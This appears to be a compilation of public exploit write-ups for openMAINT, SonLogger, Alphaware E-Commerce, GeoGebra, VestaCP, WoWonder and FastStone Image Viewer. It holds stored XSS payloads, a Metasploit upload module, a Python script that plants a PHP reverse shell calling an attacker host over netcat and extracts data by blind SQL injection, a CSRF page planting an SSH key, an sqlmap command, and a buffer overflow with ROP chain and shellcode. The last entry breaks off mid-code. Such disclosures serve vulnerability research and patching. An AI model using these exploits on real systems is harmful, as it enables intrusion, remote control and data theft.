# Exploit Title: openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting # Date: 13/03/2021 # Exploit Author: Hosein Vita # Vendor Homepage: https://www.openmaint.org/ # Software Link: https://sourceforge.net/projects/openmaint/files/2.1/Core%20updates/openmaint-2.1-3.3.1/ # Version: 2.1-3.3 # Tested on: Linux # CVE: CVE-2021-27695 Summary: Multiple stored cross-site scripting (XSS) vulnerabilities in openMAINT 2.1-3.3-b allow remote attackers to inject arbitrary web script or HTML via any "Add" sections, such as Add Card Building & Floor, or others in the Name And Code Parameters. Proof of concepts : 1-Login to you'r Dashboard As a low privilege user 2-Click On Facilities and assets - Location - Sites 3- +Add card Building 4- Code and name parameters both are vulnerable POST /openmaint/services/rest/v3/classes/Building/cards?_dc=1615626728539 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json ..... Cookie: ... {"_type":"Building","_tenant":"","Code":"\"><img src=code onmouseover=alert(1)>","Description":null,"Name":"\"><img src=name onmouseover=alert(1)>",....} The Xss will trigger in that form, and also if you click on "Map" button , the xss will trigger there ------------------------------------------------------------------------ Another Xss : 1-Like above in Facilities click on Locations and click on complex 2-click + Add card Complex 3-insert javascript payload to Code And Name POST /openmaint/services/rest/v3/classes/Complex/cards?_dc=1615627279082 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json .... Connection: close Referer: Cookie: .... {"_type":"Complex","_tenant":"","Code":"\"><img src=complex onmouseover=alert(1)>","Description":null,"Name":"\"><img src=complex onmouseover=alert(1)>",...} 4-Save it 5-Back to Sites and click on previous card 6- in position section click on "Complex" drop down 7- xss will trigger ------------------------------------------------------------------------ Another Xss: 1-Like exmaples above go to Locations and click on Sites 2-Add Card Building or click the one you created before 3-in left menu click on "Relations" 4-click "Add relations" and select one of the options 5- Add Card and select one of the options 6- insert javascript payload to code and name parameter POST /openmaint/services/rest/v3/classes/Alarm/cards?_dc=1615628392695 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json Connection: close Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578 {"_type":"","_tenant":"","Code":"\"><img src=add relation onmouseover=alert(3)>","Name":"\"><img src=add relation onmouseover=alert(3)>","Description":null,..... } 7- save it and close the form 8-click on the card and there an option which is "Open Relation Graph" click on it and click on card list 9- xss payload will trigger ------------------------------------------------------ Another Xss: 1- In "Navigation" Bar click on "Configurations" 2- Click on parameter 3- + Add card Parameter 4- Insert javascript payload to Code and Value PUT /openmaint/services/rest/v3/classes/Parameter/cards/385606?_dc=1615629885175 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578 {"_type":"Parameter","_tenant":"","Area":null,"Code":"--'\"><img src=cardparameter onmouseover=alert(4)>","Description":null,"Value":"--'\"><img src=cardparameter onmouseover=alert(5)>",....} save it and like the previous one click on "Open Relation Graph" and in card List your xss will trigger ------------------------------------------------------- Another Xss: 1-Click Facilities and assets 2-Locations 3-Select one of cards 4-Click "Add Card" 5-in "Attachments" tab click "Add attachment" select "Document" or "image" 6-insert javascript payload in "Code" and "Description" PUT /openmaint/services/rest/v3/classes/Complex/cards/384220/attachments/apovsxflx4j269tx08h1eoayg2vn9eyhbfh06079bm37cr7uk63l75oetcmzc1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate CMDBuild-ActionId: class.card.attachments.open CMDBuild-RequestId: 52807186-932d-448b-bfe3-8a51b596bcb8 Content-Type: multipart/form-data; boundary=---------------------------1049383330380851725139941543 Content-Length: 1020 Connection: close Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578 -----------------------------1049383330380851725139941543 Content-Disposition: form-data; name="attachment"; filename="blob" Content-Type: application/json {"_....."Code":"--'\"><img src=attach onmouseover=alert(7)>","Description":"--'\"><img src=attach onmouseover=alert(7)>","...} -----------------------------1049383330380851725139941543-- 7-save it and xss will trigger

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::EXE prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'SonLogger Arbitrary File Upload Exploit', 'Description' => %q{ This module exploits an unauthenticated arbitrary file upload via insecure POST request. It has been tested on version < 6.4.1 in Windows 10 Enterprise. }, 'License' => MSF_LICENSE, 'Author' => [ 'Berkan Er <[email protected]>' # Vulnerability discovery, PoC and Metasploit module ], 'References' => [ ['CVE', '2021-27964'], ['URL', 'https://erberkan.github.io/2021/SonLogger-vulns/'] ], 'Platform' => ['win'], 'Privileged' => false, 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ [ 'SonLogger < 6.4.1', { 'Platform' => 'win' } ], ], 'DisclosureDate' => '2021-03-01', 'DefaultTarget' => 0 ) ) register_options( [ Opt::RPORT(5000), OptString.new('TARGETURI', [true, 'The base path to the SonLogger', '/']) ] ) end def check_product_info send_request_cgi( 'uri' => normalize_uri(target_uri.path, '/shared/GetProductInfo'), 'method' => 'POST', 'data' => '', 'headers' => { 'Accept' => 'application/json, text/javascript, */*; q=0.01', 'Accept-Language' => 'en-US,en;q=0.5', 'Accept-Encoding' => 'gzip, deflate', 'X-Requested-With' => 'XMLHttpRequest' } ) end def check begin res = check_product_info unless res return CheckCode::Unknown('Target is unreachable.') end unless res.code == 200 return CheckCode::Unknown("Unexpected server response: #{res.code}") end version = Gem::Version.new(JSON.parse(res.body)['Version']) if version < Gem::Version.new('6.4.1') CheckCode::Vulnerable("SonLogger version #{version}") else CheckCode::Safe("SonLogger version #{version}") end rescue JSON::ParserError fail_with(Failure::UnexpectedReply, 'The target may have been updated') end end def create_payload Msf::Util::EXE.to_exe_asp(generate_payload_exe).to_s end def exploit begin print_good('Generate Payload') data = create_payload boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(5..14))}" post_data = "--#{boundary}\r\n" post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(rand(5..11))}.asp\"\r\n" post_data << "Content-Type: image/png\r\n" post_data << "\r\n#{data}\r\n" post_data << "--#{boundary}\r\n" res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/Config/SaveUploadedHotspotLogoFile'), 'ctype' => "multipart/form-data; boundary=#{boundary}", 'data' => post_data, 'headers' => { 'Accept' => 'application/json', 'Accept-Language' => 'en-US,en;q=0.5', 'X-Requested-With' => 'XMLHttpRequest' } ) unless res fail_with(Failure::Unreachable, 'No response from server') end unless res.code == 200 fail_with(Failure::Unknown, "Unexpected server response: #{res.code}") end json_res = begin JSON.parse(res.body) rescue JSON::ParserError nil end if json_res.nil? || json_res['Message'] == 'Error in saving file' fail_with(Failure::UnexpectedReply, 'Error uploading payload') end print_good('Payload has been uploaded') handler print_status('Executing payload...') send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'), 'method' => 'GET' }, 5) end rescue StandardError fail_with(Failure::UnexpectedReply, 'Failed to execute the payload') end end

# Exploit Title: Alphaware E-Commerce System 1.0 - Unauthenicated Remote Code Execution (File Upload + SQL injection) # Date: 15-03-2021 # Exploit Author: Christian Vierschilling # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/11676/alphaware-simple-e-commerce-system.html # Software Download: https://www.sourcecodester.com/download-code?nid=11676&title=Alphaware+-+Simple+E-Commerce+System+using+PHP+with+Source+Code # Version: 1.0 # Tested on: PHP 7.4.14, Linux x64_x86 # --- Description --- # # The web application allows for an unauthenticated file upload which can result in a Remote Code Execution. # We combine this issue with an sql injection to retrieve the randomised name of our uploaded php shell. # --- Proof of concept --- # #!/usr/bin/python3 import random import sys import requests from requests_toolbelt.multipart.encoder import MultipartEncoder def file_upload(target_ip, attacker_ip, attacker_port): random_number = str(random.randint(100000000,999999999)) file_name = "SHELL.php" revshell_string = '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port) m = MultipartEncoder(fields={'add': '', 'product_image': (file_name, revshell_string, 'application/x-php'),'product_code':random_number,'product_name':'R3v_5H3LL','product_price':'123','product_size':'99','brand':'N0_name','category':'Hackers','qty':'1'}) print("(+) Uploading php reverse shell file ..") r1 = requests.post('http://{}/alphaware/admin/admin_football.php'.format(target_ip), data=m, headers={'Content-Type': m.content_type}) return random_number def trigger_shell_sqli(target_ip,product_id): target_file_name = '' url = 'http://{}/alphaware/function/admin_login.php'.format(target_ip) print("(+) Now setting up our sqli for file name guessing ..") # STEP 1: Get length of target column in database .. for i in range(1, 200): payload = {'enter':'','username':"' or {}=(select char_length(product_image) from product where product_id = {})#".format(i, product_id)} r2 = requests.post(url, data=payload, allow_redirects=False) # STEP 2: successful sqli will be indicated by a redirect.. setting up our blind based file name guessing. :-) if str(r2.status_code) == '302': print("(+) Initial sqli successful, got length of our target file name!") print("(+) Now for the filename.. ", end = '') for j in range(1, i+1): for brutechar in range(32, 126): payload = {'enter':'','username':"' or '{}'=(SELECT substring((SELECT product_image from product where product_id = {}),{},1))#".format(chr(brutechar),product_id,j)} r3 = requests.post(url, data=payload, allow_redirects=False) if str(r3.status_code) == '302': target_file_name = target_file_name + chr(brutechar) print(chr(brutechar), end = '') sys.stdout.flush() break url = 'http://{}/alphaware/photo/{}.php'.format(target_ip,target_file_name.split('.')[0]) print("\r\n(+) Trying to trigger shell by requesting {} ..".format(url)) r4 = requests.get(url) def main(): if len(sys.argv) != 4: print('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0]) print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0]) sys.exit(-1) target_ip = sys.argv[1] attacker_ip = sys.argv[2] attacker_port = sys.argv[3] product_id = file_upload(target_ip, attacker_ip, attacker_port) trigger_shell_sqli(target_ip, product_id) print("(+) done!") if __name__ == "__main__": main()

# Exploit Title: GeoGebra Graphing Calculato‪r‬ 6.0.631.0 - Denial Of Service (PoC) # Date: 2021-03-15 # Exploit Author: Brian Rodriguez # Vendor Homepage: https://www.geogebra.org # Software Link: https://www.geogebra.org/download # Version: 6.0.631.0-offlinegraphing # Tested on: Windows 8.1 Pro # STEPS # Open the program Graficadora # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt in the field "Entrada..." # Crashed --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 8000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")

# Exploit Title: GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC) # Date: 2021-03-15 # Exploit Author: Brian Rodriguez # Vendor Homepage: https://www.geogebra.org # Software Link: https://www.geogebra.org/download # Version: 5.0.631.0-d # Tested on: Windows 8.1 Pro #STEPS # Open the program GeoGebra # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content in the field "Entrada:" # Crashed --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 800000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")

# Exploit Title: GeoGebra CAS Calculato‪r‬ 6.0.631.0 - Denial of Service (PoC) # Date: 2021-03-15 # Exploit Author: Brian Rodriguez # Vendor Homepage: https://www.geogebra.org # Software Link: https://www.geogebra.org/download # Version: 6.0.631.0-offlinecas # Tested on: Windows 8.1 Pro # STEPS # Open the program Calculadora CAS # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt in the field "Entrada..." # Crashed --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 8000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")

# Exploit Title: VestaCP 0.9.8 - File Upload CSRF # Exploit Author: Fady Othman # Date: 16-03-2021 # Vendor Homepage: https://vestacp.com/ # Software Link: https://github.com/myvesta/vesta # Version: Vesta Control Panel (aka VestaCP) through 0.9.8-27 and myVesta through 0.9.8-26-39 # CVE ID: CVE-2021-28379 # Patch: https://github.com/myvesta/vesta/commit/3402071e950e76b79fa8672a1e09b70d3860f355 ## Description I found that the checks performed by the upload functionality are insufficient, the upload functionality is vulnerable to CSRF, in addition it allows uploading files and creating folders under "/tmp" and under the home folder (usually "/home/admin"), the later is the one that is important for this exploit to work. I was able to use this to create a ".ssh" folder in the admin home and upload "authorized_keys" file which allowed me to access the server later as "admin" using SSH. Since this relies on a *CSRF* the admin has to visit a link, please note that *sshd* is already installed by *VestaCP* when using the default installation script so no need to install it, also please note that files can be replaced so even if the admin has already added "authorized_keys" file, it will be replaced with the attacker's file. Affected endpoint: "/upload/index.php", i.e. "/upload/index.php?dir=/home/admin/.ssh/" ## Steps to reproduce. 1. Install the latest version of VestaCP in your machine by following the instructions at https://vestacp.com/install/. 2. Login as the admin in Firefox, then open "exploit.html". 3. ssh into the machine using 'ssh -i id_rsa admin@victimmachine', now you have access as admin. # exploit.html <html> <head> <script> function exploit() { var mystring = `ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCnXyu8AsFjbuE5YMUa74PrNkO9coGWnw59v/cSVMgOZVpx+UziT0BRFurhVkyujTCXdz6OlN4yFZjCVMbAgZ7/liNu9ecGSGNcUTC+Br5YawlG9QICEaJ/bK32+luKdM1c5ONbRby+ARFsC9+iZu6IkAPnSRntbNgDZpuej/cKfm85EnvdQPAijvs4+899w2+rGvhSQ0wH4l1KNlV1yVoAsg0PFYGDnbygGA5Eo4k9LHwa2Hsm5b2Q5GhqlEUCgYFOjScuORczwhctVtp4VWKXiFoMLJupNhot/OqUXkoNgE6UUd75XcLNGMBiyfLpfXO2u1sGsw5nTiKvNn+1YdC7AKHWBjxl3wDY8hMf/gcveV4Nh45mMUu0p6kptDdVhELeeys8euHiTWOk+FLCKkps9eLiyl8gQUfWcFVj0dgqYVJne2S1U33wnofRhj0fGWAJf14xHhwnTi7u58u+0U1NJchOTHAaeX1Swqk2J34Ny9GwD01a71DFIIcIbgcef6c= fady@fady-Lenovo-Legion-Y530-15ICH-1060`; var fileContent = new Blob([mystring], { type: 'text/plain' }); myFormData = new FormData(); myFormData.append("files", fileContent, "authorized_keys"); fetch("https://localhost:8083/upload/index.php?dir=/home/admin/.ssh/", { method: "post", body: myFormData, credentials: "include" }); } </script> </head> <body onload="exploit();"> </body> </html>

# Exploit Title: WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection # Date: 16.03.2021 # Exploit Author: securityforeveryone.com # Author Mail: hello[AT]securityforeveryone.com # Vendor Homepage: https://www.wowonder.com/ # Software Link: https://codecanyon.net/item/wowonder-the-ultimate-php-social-network-platform/13785302 # Version: < 3.1 # Tested on: Linux/Windows DESCRIPTION In WoWonder < 3.1, remote attackers can gain access to the database by exploiting a SQL Injection vulnerability via the event_id parameter. The vulnerability is found in the "event_id" parameter in GET request sent to page requests.php. Example: /requests.php?hash=xxxxxxxxxxx&f=search-my-followers&filter=s4e&event_id=EVENT_ID if an attacker exploits this vulnerability, attacker may access private data in the database system. EXPLOITATION # GET /requests.php?hash=xxxxxxxxxxx&f=search-my-followers&filter=s4e&event_id=EVENT_ID HTTP/1.1 # Host: Target Sqlmap command: sqlmap -r request.txt --risk 3 --level 5 --random-agent -p event_id --dbs Payload: f=search-my-followers&s=normal&filter=s4e&event_id=1') AND 5376=5376-- QYxF

# Exploit title: FastStone Image Viewer 7.5 - .cur BITMAPINFOHEADER 'BitCount' Stack Based Buffer Overflow (ASLR & DEP Bypass) # Exploit Author: Paolo Stagno # Date: 15/03/2020 # Vendor Homepage: https://www.faststone.org/ # Download: https://www.faststonesoft.net/DN/FSViewerSetup75.exe # https://github.com/VoidSec/Exploit-Development/tree/master/windows/x86/local/FastStone_Image_Viewer_v.7.5/ # Version: 7.5 # Tested on: Windows 10 Pro x64 v.1909 Build 18363.1256 # Category: local exploit # Platform: windows # Module info : #---------------------------------------------------------------------------------------------------------------------- #Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path #---------------------------------------------------------------------------------------------------------------------- #0x00400000 | 0x00abf000 | 0x006bf000 | False | False | False | False | False | 7.5.0.0 [FSViewer.exe] (C:\Program Files (x86)\FastStone Image Viewer\FSViewer.exe) #0x6ad80000 | 0x6adfe000 | 0x0007e000 | False | False | False | False | False | -1.0- [fsplugin05.dll] (C:\Program Files (x86)\FastStone Image Viewer\fsplugin05.dll) #0x6afb0000 | 0x6b011000 | 0x00061000 | True | True | False | False | False | -1.0- [fsplugin06.dll] (C:\Program Files (x86)\FastStone Image Viewer\fsplugin06.dll) #---------------------------------------------------------------------------------------------------------------------- #!/usr/bin/python import struct, sys print("\n[>] FastStone Image Viewer v. <= 7.5 Exploit by VoidSec\n") filename="FSViewer_v.7.5_exploit.cur" ################################################################################### # Shellcode # MAX Shellcode size: 556 # ImageData - ROP NOP - Rop Chain - Stack Adjustment = 776 - 144 - 68 - 8 = 556 # Custom calc.exe shellcode # size: 112 ################################################################################### shellcode=( "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" "\x77\x20\x8b\x3f\x80\x7e\x0c\x33" "\x75\xf2\x89\xc7\x03\x78\x3c\x8b" "\x57\x78\x01\xc2\x8b\x7a\x20\x01" "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" "\x45\x81\x3e\x43\x72\x65\x61\x75" "\xf2\x81\x7e\x08\x6f\x63\x65\x73" "\x75\xe9\x8b\x7a\x24\x01\xc7\x66" "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" "\xb1\xff\x53\xe2\xfd\x68\x63\x61" "\x6c\x63\x89\xe2\x52\x52\x53\x53" "\x53\x53\x53\x53\x52\x53\xff\xd7" ) if (len(shellcode)>556): sys.exit("Shellcode's size must be <= 556 bytes") ################################################################################### # Cur File Format # --------------------------------------------------------------------------------- # | Reserved | Type | Image Count | # | 00 00 | 02 00 | 02 00 | <- CUR file will contains two images # Entries: # | Width | Height | ColorCount | Reserved | XHotSpot | YHotSpot | SizeInBytes | File Offset | # | 30 | 30 | 00 | 00 | 01 00 | 02 00 | 30 03 00 00 | 26 00 00 00 | <- we'll corrupt the first image with rop chain & shellcode # | 20 | 20 | 00 | 00 | 02 00 | 04 00 | E8 02 00 00 | 56 03 00 00 | <- while leaving the 2nd one "untouched" a part from the stack pivot (should leave the cursor preview intact) # 1st Image Info Header: # | Size | Width | Height | Planes | BitCount | Compression | ImageSize | XpixelsPerM | YpixelsPerM | Colors Used | ColorsImportant | # | 28 00 00 00 | 30 00 00 00 | 60 00 00 00 | 01 00 | 89 30 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | # 1st ImageData(BLOB) # 2nd Image Info Header: # 2nd ImageData(BLOB) # --------------------------------------------------------------------------------- # BitCount will be used to read # number of bytes into a buffer triggering the buffer overflow # its value can be modified but we need to account for two operations happening into the software. # - SHL 1, 89 = 0x200 # - SHL 200, 2 = 0x800 (2048d) number of bytes to be read from the file # we'll have to pad the image data to match it's size in bytes defined in the header SizeInBytes # ImageData = SizeInBytes - ImageInfoHeader Size (330h-28h=308h 776d) ################################################################################### image_data_pad = 776 def create_rop_nop(): rop_gadgets = [ 0x6adc5ab6, # 0x6adc5ab6 (RVA : 0x00045ab6) : # DEC ECX # RETN ** [fsplugin05.dll] ** | {PAGE_EXECUTE_READ} ] return ''.join(struct.pack('<I', _) for _ in rop_gadgets) def create_rop_chain(): rop_gadgets = [ #[---INFO:gadgets_to_set_esi:---] 0x00405bd4, # POP EAX ; RETN [FSViewer.exe] 0x6adf4160, # ptr to &VirtualProtect() [IAT fsplugin05.dll] 0x008b3977, # MOV EAX,DWORD PTR DS:[EAX] ; RETN [FSViewer.exe] 0x0083f67a, # XCHG EAX,ESI ; RETN [FSViewer.exe] #[---INFO:gadgets_to_set_ebp:---] 0x005b35b8, # POP EBP ; RETN [FSViewer.exe] 0x00454521, # & jmp esp [FSViewer.exe] #[---INFO:gadgets_to_set_ebx:---] 0x00630472, # POP EBX ; RETN [FSViewer.exe] 0x00000201, # 0x00000201-> ebx #[---INFO:gadgets_to_set_edx:---] 0x004798db, # POP EDX ; RETN [FSViewer.exe] 0x00000040, # 0x00000040-> edx #[---INFO:gadgets_to_set_ecx:---] 0x004c7832, # POP ECX ; RETN [FSViewer.exe] 0x00991445, # &Writable location [FSViewer.exe] #[---INFO:gadgets_to_set_edi:---] 0x0040c3a8, # POP EDI ; RETN [FSViewer.exe] 0x0057660b, # RETN (ROP NOP) [FSViewer.exe] #[---INFO:gadgets_to_set_eax:---] 0x00404243, # POP EAX ; RETN [FSViewer.exe] 0x90909090, # nop #[---INFO:pushad:---] 0x6adc21bf, # PUSHAD # RETN [fsplugin05.dll] ] return ''.join(struct.pack('<I', _) for _ in rop_gadgets) # Cur image = 1597 bytes ################################################################################### cur_Signature = "\x00\x00\x02\x00\x02\x00" # | Reserved | Type | Image Count | cur_Entries = ( "\x30\x30\x00\x00\x01\x00\x02\x00\x30\x03\x00\x00\x26\x00\x00\x00" # 1st Entry "\x20\x20\x00\x00\x02\x00\x04\x00\xE8\x02\x00\x00\x56\x03\x00\x00" # 2nd Entry ) # 1st Image Info Header cur_1InfoHeader = "\x28\x00\x00\x00\x30\x00\x00\x00\x60\x00\x00\x00\x01\x00\x89\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" # 1st ImageData # cur_1ImageData_orig = "\x00\x00\x00\x00\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xC0\x00\x00\x00\x00\x00\x00\x08\x20\x00\x00\x00\x00\x00\x00\x08\x20\x00\x00\x00\x00\x00\x00\x10\x40\x00\x00\x00\x00\x00\x00\x10\x40\x00\x00\x00\x00\x00\x00\x20\x80\x00\x00\x00\x00\x00\x00\x20\x80\x00\x00\x00\x00\x00\x80\x41\x00\x1F\x80\x00\x00\x00\xC0\x41\x00\x3F\xC0\x00\x00\x00\xA0\x82\x00\x3F\xC0\x00\x00\x00\x90\x82\x00\x1F\x80\x00\x00\x00\x89\x04\x00\x00\x00\x00\x00\x00\x85\x04\x00\x1F\x80\x00\x00\x00\x82\x08\x00\x1F\x80\x00\x00\x00\x80\x0F\xFE\x1F\x80\x00\x00\x00\x80\x00\x04\x1F\x80\x00\x00\x00\x80\x00\x08\x0F\x80\x00\x00\x00\x80\x00\x10\x07\xC0\x00\x00\x00\x80\x00\x20\x03\xE0\x00\x00\x00\x80\x00\x47\xC1\xF0\x00\x00\x00\x80\x00\x87\xC1\xF8\x00\x00\x00\x80\x01\x07\xC1\xFC\x00\x00\x00\x80\x02\x07\xC1\xFC\x00\x00\x00\x80\x04\x07\xC1\xFC\x00\x00\x00\x80\x08\x07\xC1\xFC\x00\x00\x00\x80\x10\x07\xE3\xFC\x00\x00\x00\x80\x20\x03\xFF\xF8\x00\x00\x00\x80\x40\x01\xFF\xF0\x00\x00\x00\x80\x80\x00\xFF\xE0\x00\x00\x00\x81\x00\x00\x00\x00\x00\x00\x00\x82\x00\x00\x00\x00\x00\x00\x00\x84\x00\x00\x00\x00\x00\x00\x00\x88\x00\x00\x00\x00\x00\x00\x00\x90\x00\x00\x00\x00\x00\x00\x00\xA0\x00\x00\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xF8\x3F\xFF\xFF\xFF\x00\x00\xFF\xF0\x1F\xFF\xFF\xFF\x00\x00\xFF\xF0\x1F\xFF\xFF\xFF\x00\x00\xFF\xE0\x3F\xFF\xFF\xFF\x00\x00\xFF\xE0\x3F\xFF\xFF\xFF\x00\x00\xFF\xC0\x7F\xFF\xFF\xFF\x00\x00\xFF\xC0\x7F\xE0\x7F\xFF\x00\x00\x7F\x80\xFF\xC0\x3F\xFF\x00\x00\x3F\x80\xFF\x80\x1F\xFF\x00\x00\x1F\x01\xFF\x80\x1F\xFF\x00\x00\x0F\x01\xFF\xC0\x3F\xFF\x00\x00\x06\x03\xFF\xE0\x7F\xFF\x00\x00\x02\x03\xFF\xC0\x3F\xFF\x00\x00\x00\x07\xFF\xC0\x3F\xFF\x00\x00\x00\x00\x01\xC0\x3F\xFF\x00\x00\x00\x00\x03\xC0\x3F\xFF\x00\x00\x00\x00\x07\xE0\x3F\xFF\x00\x00\x00\x00\x0F\xF0\x1F\xFF\x00\x00\x00\x00\x10\x18\x0F\xFF\x00\x00\x00\x00\x30\x1C\x07\xFF\x00\x00\x00\x00\x70\x1C\x03\xFF\x00\x00\x00\x00\xF0\x1C\x01\xFF\x00\x00\x00\x01\xF0\x1C\x01\xFF\x00\x00\x00\x03\xF0\x1C\x01\xFF\x00\x00\x00\x07\xF0\x1C\x01\xFF\x00\x00\x00\x0F\xF0\x00\x01\xFF\x00\x00\x00\x1F\xF8\x00\x03\xFF\x00\x00\x00\x3F\xFC\x00\x07\xFF\x00\x00\x00\x7F\xFE\x00\x0F\xFF\x00\x00\x00\xFF\xFF\x00\x1F\xFF\x00\x00\x01\xFF\xFF\xFF\xFF\xFF\x00\x00\x03\xFF\xFF\xFF\xFF\xFF\x00\x00\x07\xFF\xFF\xFF\xFF\xFF\x00\x00\x0F\xFF\xFF\xFF\xFF\xFF\x00\x00\x1F\xFF\xFF\xFF\xFF\xFF\x00\x00\x3F\xFF\xFF\xFF\xFF\xFF\x00\x00\x7F\xFF\xFF\xFF\xFF\xFF\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00" print("Generating 1st ImageData BLOB:") cur_1ImageData = "" cur_1ImageData += create_rop_nop() * ( (1560 - 1416 ) / 4 ) # 1560 stack pivot - 1416 where our cyclic pattern has been found print("- ROP NOP:\t\t{}".format(len(cur_1ImageData))) cur_1ImageData += create_rop_chain() print("- ROP Chain:\t\t{}".format(len(create_rop_chain()))) cur_1ImageData += "\x81\xC4\x44\xFD\xFF\xFF\x90\x90" # stack adjustment for meterpreter GetPC routine: add esp, -700 print("- Stack Adjustment:\t8") cur_1ImageData += shellcode print("- Shellcode:\t\t{}".format(len(shellcode))) cur_1ImageData += "A" * (image_data_pad - len(cur_1ImageData)) # 2nd Image Info Header cur_2InfoHeader = "\x28\x00\x00\x00\x20\x00\x00\x00\x40\x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" # 2nd ImageData (if this does not trigger the stack pivot it should be changed removing the beginning \x00 byte of cur_2ImageData2 and adding it back at the end of cur_2ImageData section) cur_2ImageData = 